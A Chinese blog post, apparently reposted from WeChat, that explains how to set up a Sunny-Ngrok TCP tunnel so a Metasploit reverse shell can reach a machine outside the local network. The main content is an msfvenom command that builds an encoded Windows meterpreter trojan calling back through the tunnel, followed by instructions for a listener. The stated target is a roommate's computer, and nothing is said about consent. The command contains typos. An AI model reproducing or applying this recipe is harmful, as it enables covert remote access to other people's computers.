内网穿透实例讲解

前言

文章提供内容仅供学习交流使用，不可用作非法行为。我是菜鸡，不要喷我啊😁

过程记录

这个笔记有一段时间了，今天决定发出来和大家分享一下。前段时间接触到 msf 制作 各操作系统平台的木马程序，但是在学习的教程中都是用的内网在虚拟机上进行测试，虽然在虚拟靶机上能成功，想拿舍友的电脑试试能不能成功，但是如果我们不接入同一个WiFi网络，我们要怎样做才能够成功呢。 

在查询了一些资料过后，舍友的电脑可以算是外网了，那么问题来了，如何才能让我的电脑和舍友的电脑建立连接呢？这里需要用到一个叫做内网穿透的办法（好像还可以叫做端口转发的😅）。我个人理解来看就是将我的电脑与一台远程的公网服务器（下面的Sunny-Ngork）连接，通过远程的公网服务器将我的流量转发到舍友的电脑。反之舍友的流量也可以通过远程的公网服务器转发到我的机器上。

接下来就是如何使用 Sunny-Ngrok 的教程部分了，当然内网穿透的工具有很多，我这里就 以 Sunnny-Ngrok 为例。

①进入 Sunny-Ngrok 官网（https://www.ngrok.cc/）

②点击右上角“注册”注册一个账号（此过程就略过了）

③然后登陆进去，点击隧道管理

④然后点击隧道开通，选择一个合适的套餐，但是有免费的套餐， 在最下面，贫穷的我当然选择白嫖。

⑤点击立即购买后，我这里选择 tcp，隧道名称自便，远程端口选择 一个 10000-11000 的端口，如果有占用，系统会进行提示。本地端 口 ip 就是本地 ip，windows 下 ipconfig 查看（这里应该懂吧）， linux 下 ifconfig 查看（我这里使用 Linux 的 ip），端口可以自定义我 这里选择默认。

确认无误后，就点击“确定添加”。

⑥而后点击隧道管理，记住这里的隧道 id 和域名和端口，下面会用 到。

⑦回到主页，点击“客户端下载”，下载合适的版本，我这里下载 linux64 位版本。

⑧在 linux 里解压该包，并运行 sunny，打码的地方是隧道 id，显示 online 就是运行成功。

⑨接下来就是制作木马程序了。域名端口号就是隧道管理的地方（⑥图中的赠送域名）刚刚喊记住的域名和端口 sfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=域名 LPORT=端口号 -b "x00" -e x86/shikata_ga_nai -i -10 -f exe -o /home/dgz/test2.exe

⑩打开 msfconsole，设置本地监听，设置过程如下。监听打开后， 只需要在 windows 运行木马程序即可连接成功。

这样的话，外网服务器反弹的shell将会反弹到外网服务器上，然后再传到内网的机器上。

同样的道理，如果你想要别人访问到你内网的服务器上，就只需要将你内网服务器的地址（192.168.3.62:80）绑定到外网服务器

（www.freedomain.com:1234）上，这样别人就可以通过直接访问域名

www.freedomain.com访问到你的内网服务器了。

更多文章请关注公众号：星河疯客admin

万水千山总是情，点赞再走行不行的(ง •_•)ง

原文始发于微信公众号（星河疯客admin）：内网穿透实例讲解